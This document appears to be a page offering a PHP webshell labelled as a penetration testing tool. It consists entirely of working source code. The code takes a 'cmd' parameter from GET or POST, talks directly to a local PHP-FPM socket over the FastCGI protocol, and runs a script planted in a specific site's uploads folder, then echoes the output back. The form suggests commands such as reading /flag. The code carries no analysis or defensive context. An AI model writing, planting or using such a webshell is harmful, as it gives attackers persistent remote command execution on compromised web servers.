🔓 Ultimate Webshell - Penetration Testing Tool

📖 File Reader

<?php
// Web FastCGI shell - ?cmd=whoami or POST cmd=whoami
function send_fcgi_request($socket, $requestId, $scriptFile, $cmd) {
    $beginRequest = pack('CCnnCa*', 1, 1, $requestId, 8, 0, pack('NN', 0, 1));
    fwrite($socket, $beginRequest);
    
    $params = [
        'REQUEST_METHOD' => $_SERVER['REQUEST_METHOD'] ?? 'GET',
        'SCRIPT_FILENAME' => $scriptFile,
        'SCRIPT_NAME' => '/console.php',
        'REQUEST_URI' => '/console.php?' . ($_GET['cmd'] ?? $_POST['cmd'] ?? ''),
        'QUERY_STRING' => $_SERVER['QUERY_STRING'] ?? ($_GET['cmd'] ?? ''),
        'DOCUMENT_ROOT' => '/www/wwwroot/hljrlsj.com/public',
        'SERVER_SOFTWARE' => 'php-fcgi',
        'REMOTE_ADDR' => $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1',
        'CONTENT_LENGTH' => strlen(file_get_contents('php://input'))
    ];
    
    foreach ($params as $name => $value) {
        $nameLen = strlen($name); $valueLen = strlen($value);
        $nameLenByte = $nameLen < 128 ? chr($nameLen) : chr(128 | ($nameLen >> 24)) . pack('N', $nameLen);
        $valueLenByte = $valueLen < 128 ? chr($valueLen) : chr(128 | ($valueLen >> 24)) . pack('N', $valueLen);
        $paramData = $nameLenByte . $valueLenByte . $name . $value;
        $contentLen = strlen($paramData);
        $paddingLen = (8 - ($contentLen % 8)) % 8;
        $header = pack('CCnnC', 1, 4, $requestId, $contentLen, $paddingLen);
        fwrite($socket, $header . $paramData . str_repeat("\0", $paddingLen));
    }
    
    $header = pack('CCnnC', 1, 4, $requestId, 0, 0);
    fwrite($socket, $header);
    $header = pack('CCnnC', 1, 5, $requestId, 0, 0);
    fwrite($socket, $header);
}

function exec_cmd($cmd = null) {
    $socketPath = '/tmp/php-cgi-73.sock';
    $scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
    
    $socket = @stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
    if (!$socket) return "Socket error: $errstr ($errno)";
    
    stream_set_timeout($socket, 10);
    send_fcgi_request($socket, 1, $scriptFile, $cmd);
    
    $output = ''; 
    while (!feof($socket)) $output .= fread($socket, 8192);
    fclose($socket);
    
    return trim(preg_replace('/<body[^>]*>/is', '', preg_replace('/<\/body>/is', '', $output)));
}

// GET/POST cmd parameter
$cmd = $_GET['cmd'] ?? $_POST['cmd'] ?? null;
if ($cmd) {
    echo "<pre>" . htmlspecialchars(exec_cmd($cmd)) . "</pre>";
} else {
    echo '<h2>FastCGI Web Shell</h2>
    <form method="POST">
        <input name="cmd" placeholder="id; ls -la /tmp/; cat /flag" style="width:500px">
        <input type="submit" value="Execute">
    </form>
    <p><b>Or URL:</b> ?cmd=whoami</p>';
}
?>